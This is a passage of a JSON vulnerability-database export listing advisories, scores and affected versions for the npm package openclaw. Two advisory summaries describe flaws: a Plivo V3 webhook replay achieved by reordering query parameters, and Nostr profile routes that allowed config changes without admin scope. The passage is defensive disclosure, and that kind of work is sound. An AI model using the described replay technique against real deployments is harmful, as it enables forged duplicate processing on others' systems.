                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-utv2-tyje-kfht"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vv2u-u7mn-rfe1"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24"
                }
            ],
            "aliases": [
                "GHSA-vqvg-86cc-cg83"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-bumq-54sb-6ua7"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91130?format=api",
            "vulnerability_id": "VCID-bzw7-yvu2-yqa2",
            "summary": "OpenClaw: Voice-call Plivo V3 webhook replay key uses unsorted URL, allowing replay via query-parameter reordering\n## Summary\n\nPlivo V3 signature verification canonicalized query ordering, but replay detection hashed the raw verification URL. Reordering query parameters preserved a valid signature while producing a fresh replay-cache key.\n\n## Impact\n\nAn attacker who captured one valid signed Plivo V3 webhook could replay the same event by permuting query parameters and trigger duplicate voice-call processing.\n\n## Affected Component\n\n`extensions/voice-call/src/webhook-security.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `85777e726c` (`Voice Call: canonicalize Plivo V3 replay key`).",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41395",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00018",
                            "scoring_system": "epss",
                            "scoring_elements": "0.05113",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00018",
                            "scoring_system": "epss",
                            "scoring_elements": "0.05091",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00018",
                            "scoring_system": "epss",
                            "scoring_elements": "0.05098",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41395"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/85777e726cb02c01a911b3ff832ddf4d664d5c94",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/85777e726cb02c01a911b3ff832ddf4d664d5c94"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-8689-gm9g-jgr6",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:20:49Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-8689-gm9g-jgr6"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41395",
                    "reference_id": "CVE-2026-41395",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41395"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-8689-gm9g-jgr6",
                    "reference_id": "GHSA-8689-gm9g-jgr6",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-8689-gm9g-jgr6"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-webhook-replay-via-query-parameter-reordering-in-plivo-v3",
                    "reference_id": "openclaw-webhook-replay-via-query-parameter-reordering-in-plivo-v3",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:20:49Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-webhook-replay-via-query-parameter-reordering-in-plivo-v3"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
                "CVE-2026-41395",
                "GHSA-8689-gm9g-jgr6"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-bzw7-yvu2-yqa2"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89505?format=api",
            "vulnerability_id": "VCID-c25h-khws-2fc3",
            "summary": "OpenClaw: Nostr profile mutation routes allowed operator.write config persistence\n## Summary\n\nNostr profile mutation routes let a caller holding `operator.write` persist profile config, without requiring admin authority.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nNostr plugin HTTP profile routes could persist profile config through a path that did not require admin authority.\n\n## Technical Details\n\nThe fix requires `operator.admin` scope for Nostr profile mutation routes.\n\n## Fix\n\nThe issue was fixed in #63553. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `6517c700de9bb0ee11b41ab625ef3b63d01b6083`\n- PR: #63553\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zpbrent and @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer, for reporting this issue.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/pull/63553",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/pull/63553"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-f3h5-h452-vp3j",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-f3h5-h452-vp3j"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-f3h5-h452-vp3j",
                    "reference_id": "GHSA-f3h5-h452-vp3j",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
